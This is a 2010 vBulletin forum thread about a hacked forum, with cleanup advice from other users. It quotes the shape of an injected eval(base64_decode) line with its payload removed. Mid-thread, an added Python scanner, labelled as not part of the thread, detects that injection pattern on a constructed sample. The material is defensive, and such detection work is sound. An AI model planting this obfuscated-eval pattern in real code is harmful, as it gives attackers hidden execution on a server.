
nkmsw8 05-07-2010 01:07 PM

HELP...My forum has been infected with a virus
 
I have been running this forum for about two years now and early this morning I was notified that I had a virus or that my forum was hacked. The website is floridaconcealedcarry.com/Forum/index.php.

I can't login to it and don't know where to start as far as correcting this. I was set to upgrade to the new 4.0 software in a few days and so this is devastating for me.

Thanks

borbole 05-07-2010 01:24 PM

Quote:

Originally Posted by nkmsw8 (Post 2033117)
I have been running this forum for about two years now and early this morning I was notified that I had a virus or that my forum was hacked. The website is *** removed live link ***

I can't login to it and don't know where to start as far as correcting this. I was set to upgrade to the new 4.0 software in a few days and so this is devastating for me.

Thanks

First off, I would advise anyone against clicking the link to the infected forum for security reasons.

That said, try to do a clean up of all your vb files by overwriting them with a fresh set from the vb package, your version. Then do another thorough checkup of all your server space and database and if everything is ok upgrade to the latest version. Also change all the passwords for your admin, ftp, cp etc. And last but not least, inform your host about this so they can check their logs and see how exactly they got in.

Lynne 05-07-2010 01:28 PM

Can you ftp to your site? If so, replace all the files with totally default files and remove any non-vbulletin files.

Have you talked to your host? They may be able to help figure out how this happened.

nkmsw8 05-07-2010 01:29 PM

Thanks for the advice. I will be doing these things now.

I have gone ahead and changed my ftp password but I cannot access my CP or Admin. I will download the entire site from the server onto my computer in a secure sandbox. However, how can I save the user data from these files? My oldest backup is weeks old.

Thanks.

borbole 05-07-2010 02:19 PM

Quote:

Originally Posted by nkmsw8 (Post 2033128)
Thanks for the advice. I will be doing these things now.

I have gone ahead and changed my ftp password but I cannot access my CP or Admin. I will download the entire site from the server onto my computer in a secure sandbox. However, how can I save the user data from these files? My oldest backup is weeks old.

Thanks.

That data is stored at the db and not in the php files. Try to clean them up as suggested above and see if it would help.

nkmsw8 05-07-2010 07:22 PM

Thanks for all your help. The forum is now back up and running. I re-installed all the PHP files and that took care of the problem.

Thanks

borbole 05-07-2010 07:29 PM

Quote:

Originally Posted by nkmsw8 (Post 2033336)
Thanks for all your help. The forum is now back up and running. I re-installed all the PHP files and that took care of the problem.

Thanks

Glad to hear that. Did you also upgrade to the latest version? Also don't forget to inform your host about it so they can investigate things on their end as well.

nkmsw8 05-07-2010 10:58 PM

I was digging around in my config.php file while changing the db password and I found this code at the top of the file.

Quote:

<?php /**/ eval(base64_decode("[base64-encoded payload removed]"));?>
Should this be there?

borbole 05-07-2010 11:21 PM

Quote:

Originally Posted by nkmsw8 (Post 2033454)
I was digging around in my config.php file while changing the db password and I found this code at the top of the file.



Should this be there?

No, that code should be deleted. If I were you I would also check thoroughly my server space for anything out of the ordinary. It would be best if you checked all the other .php non vb files that you might have. Like for ex from another script like wordpress, etc.
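
Added example (not part of the thread and not code from any poster): a report-only Python scan for the injection shape nkmsw8 quoted, a PHP block at the very top of a file whose only statement is `eval(base64_decode(...))`. The sample tree, file names and payload are constructed, and the function names are hypothetical.

```python
import base64
import hashlib
import re
import tempfile
from pathlib import Path

# Shape quoted in the thread: the file *starts* with a PHP block whose only
# statement is eval(base64_decode("...")), followed by the original file.
INJECTED_PREFIX = re.compile(
    rb'\A\s*<\?php\s*(?:/\*.*?\*/\s*)?eval\s*\(\s*base64_decode\s*\(\s*'
    rb'(["\'])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*;\s*\?>',
    re.DOTALL,
)

def scan_file(path):
    """Return a finding for a file that starts with the injected block, else None."""
    match = INJECTED_PREFIX.match(Path(path).read_bytes())
    if match is None:
        return None
    payload = b"".join(match.group(2).split())  # drop whitespace inside the blob
    return {
        "path": str(path),
        "prefix_bytes": match.end(),  # original content begins at this offset
        "payload_sha256": hashlib.sha256(payload).hexdigest(),  # groups identical injections
    }

def scan_tree(root):
    """Scan every .php file under root; report only, nothing is modified."""
    findings = (scan_file(p) for p in sorted(Path(root).rglob("*.php")))
    return [f for f in findings if f is not None]

def build_sample_tree(root):
    """Constructed sample data: one infected file, two clean ones."""
    root = Path(root)
    (root / "includes").mkdir(parents=True, exist_ok=True)
    clean = b"<?php\n$config['Database']['dbname'] = 'forum';\n?>\n"
    harmless = base64.b64encode(b'echo "constructed sample";')
    (root / "includes" / "config.php").write_bytes(
        b'<?php /**/ eval(base64_decode("' + harmless + b'"));?>' + clean)
    (root / "index.php").write_bytes(clean)
    # Ordinary mid-file use of base64_decode must not be flagged.
    (root / "attachment.php").write_bytes(b"<?php\n$raw = base64_decode($row['data']);\n?>\n")
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for finding in scan_tree(build_sample_tree(tmp)):
            print(finding)
```

A hit only shows that the file was writable by whoever got in; the replies' advice still applies, so replace flagged files from a fresh package and change the passwords rather than trusting the rest of the file.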

nkmsw8 05-07-2010 11:31 PM

Will do. Thanks :up:

How many different places in the Vbulletin software do you have to update the db password when it's changed on the db server? I'm getting a db error after I updated the password on the db and the config.php file.

Angel-Wings 05-08-2010 04:02 AM

Changing in config.php is enough. But - did you reinstall everything and I really mean everything?
If the machine has been "hacked" once, how can you ensure nothing has been modified and that you can trust an installed "security tool" any longer?

Do backups before of course :)

Marco van Herwaarden 05-08-2010 12:54 PM

If there are modified files, like in your case the config.php, then the attacker most likely has not used vBulletin to enter your file system.

Most likely you are on a vulnerable server. Please contact your host and place a fresh copy of all files once your host has secured the server.

John59 05-18-2010 08:29 AM

Hi to all
I have the same problem,
It all started on the first of May
I cleaned and restored everything to a month ago except the database
and attachments (mainly photos, no programs or any code)
the problem keeps coming back every 4 - 5 days all .php files are modified
or some del, the first time it happened I also had the above code in all .php
files.
I contacted my host and they just keep giving me advice how to check and secure
my code (VB in my case) and they do nothing,
I also come to believe that the problem is a host security problem,
Do you think that if I change host (since they do not seem to accept that it is a host security problem and investigate they are doing nothing to help just polite talk and advice)
will my problems be over??
Ps. I know nothing about programming and .PHP
Only how to upload and use VB (3 years experience)

borbole 05-18-2010 02:35 PM

Quote:

Originally Posted by John59 (Post 2039047)
Hi to all
I have the same problem,
It all started on the first of May
I cleaned and restored everything to a month ago except the database
and attachments (mainly photos, no programs or any code)
the problem keeps coming back every 4 - 5 days all .php files are modified
or some del, the first time it happened I also had the above code in all .php
files.
I contacted my host and they just keep giving me advice how to check and secure
my code (VB in my case) and they do nothing,
I also come to believe that the problem is a host security problem,
Do you think that if I change host (since they do not seem to accept that it is a host security problem and investigate they are doing nothing to help just polite talk and advice)
will my problems be over??
Ps. I know nothing about programming and .PHP
Only how to upload and use VB (3 years experience)

Well, in that case then you will be better off with another host who takes security more seriously.

nkmsw8 05-18-2010 02:49 PM

Change all your passwords also. Hosting password, FTP password, Database password, and your Hosting company account login password.

John59 05-18-2010 08:31 PM

Quote:

Originally Posted by nkmsw8 (Post 2039259)
Change all your passwords also. Hosting password, FTP password, Database password, and your Hosting company account login password.

Already did that days ago.
The problem keeps coming back every 4-5 days. As it was mentioned, it seems like the only solution is to change host.

maidos 05-21-2010 04:13 AM

I'm curious, are you possibly using dreamhost or godaddy and use wordpress for your site?
My friend has the same encrypted virus which kept popping up till I removed the code for him... but if it's the mentioned host, you should move away.

John59 05-21-2010 05:11 AM

No, I am not using wordpress.
And yes, my host is one of the above.

daveaite 05-21-2010 08:38 AM

The issue could have begun if you installed some "nulled" scripts. Always a bad idea as the people who null them implant ways to get into your server within those scripts.

maidos 05-21-2010 12:01 PM

Quote:

Originally Posted by daveaite (Post 2041168)
The issue could have begun if you installed some "nulled" scripts. Always a bad idea as the people who null them implant ways to get into your server within those scripts.

In this case, I very much doubt it, since godaddy and dreamhost got their servers compromised and they admit it, so millions of websites got reported injected with that virus site.

http://www.wpsecuritylock.com/ninopl...dy-case-study/
Even if you don't run wordpress, that site got pretty good tip how to secure your account with godaddy.

And a good person posted a script to remove the infected code on all files:
http://blog.sucuri.net/2010/05/simpl...or-latest.html

John59 05-25-2010 10:06 PM

Thank you all, I did what you suggested. It looks like my forum is clean, 5 days now with no problem.

